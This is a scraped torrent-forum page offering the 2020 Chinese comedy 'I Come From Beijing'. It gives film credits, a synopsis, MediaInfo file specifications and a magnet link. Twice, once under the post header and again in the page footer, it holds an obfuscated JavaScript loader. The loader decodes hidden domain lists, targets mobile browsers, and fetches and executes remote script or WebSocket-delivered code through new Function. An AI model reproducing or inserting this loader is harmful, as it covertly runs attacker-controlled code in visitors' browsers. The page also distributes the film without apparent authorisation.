我来自北京之扶兄弟一把[国语配音/中文字幕].I.Come.From.Beijing.2020.WEB-DL.4K.H265.AAC 10.88GB

版主小s 1月前 284

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 我来自北京之扶兄弟一把 / I Come From Beijing

◎年 代 2020

◎产 地 中国大陆

◎类 别 喜剧

◎上映日期 2020-01-24(中国大陆)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣链接 https://movie.douban.com/subject/34926478/

◎片 长 92分钟

◎导 演 柏杉 Shan Bai (id:1316423)

◎演 员 赵亮 Liang Zhao (id:1314024)

陈创 Chuang Chen (id:1313581)

刘智扬 Zhiyang Liu (id:1333723)

王婷 Ting Wang (id:1350012)

张玺 Xi Zhang (id:1358066)

郭靖宇 Jingyu Guo (id:1313592)

◎标 签 正能量 / 喜剧 / 精准扶贫 / 扶贫攻坚 / 大陆 / 2020 / 搞笑 / 剧情

◎简 介

大美的贵州黔西南地区,带着养蜂技术反哺家乡的大学毕业生王晓石(刘智扬 饰),和有着丰富基层扶贫经验的村长郑金柱(赵亮 饰),在扶贫工作中成为一对老少搭档。实际工作中,王晓石因缺乏经验遭到郑金柱的奚落。王晓石意外与错失的女神郑玉娟重逢。虽然在村里推广养蜂计划屡屡碰壁,为了证明自己,王晓石主动接受了郑金柱提出的考验,帮助三位贫困钉子户脱贫致富。孤寡怪僻的荣奶奶、酗酒成性的刘老九、愚钝青年周二憨……三人各出难题,王晓石苦不堪言。然而养蜂扶贫计划,推进的并不那么顺利,闹剧百出、扶贫事业受阻……在春节来临前,王晓石立志要帮助大家解决困扰,同时更想得到未来岳父郑金柱的肯定……

  1. ##### MediaInfo ######

  2. General

  3. Complete name : I Come From Beijing 2020 WEB-DL 4K H265 [email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/mp41)

  7. File size : 10.9 GiB

  8. Duration : 1 h 31 min

  9. Overall bit rate : 17.0 Mb/s

  10. Writing application : Lavf58.30.100


  11. Video

  12. ID : 1

  13. Format : HEVC

  14. Format/Info : High Efficiency Video Coding

  15. Format profile : [email protected]@High

  16. Codec ID : hev1

  17. Codec ID/Info : High Efficiency Video Coding

  18. Duration : 1 h 31 min

  19. Bit rate : 16.9 Mb/s

  20. Width : 3 840 pixels

  21. Height : 1 632 pixels

  22. Display aspect ratio : 2.35:1

  23. Frame rate mode : Constant

  24. Frame rate : 25.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.108

  29. Stream size : 10.8 GiB (99%)

  30. Codec configuration box : hvcC


  31. Audio

  32. ID : 2

  33. Format : AAC LC

  34. Format/Info : Advanced Audio Codec Low Complexity

  35. Codec ID : mp4a-40-2

  36. Duration : 1 h 31 min

  37. Bit rate mode : Constant

  38. Bit rate : 124 kb/s

  39. Channel(s) : 2 channels

  40. Channel layout : L R

  41. Sampling rate : 44.1 kHz

  42. Frame rate : 43.066 FPS (1024 SPF)

  43. Compression mode : Lossy

  44. Stream size : 81.7 MiB (1%)

  45. Default : Yes

  46. Alternate group : 1




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:34DC1D0AA0432587BFD459E873AF93575D9FA54F

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};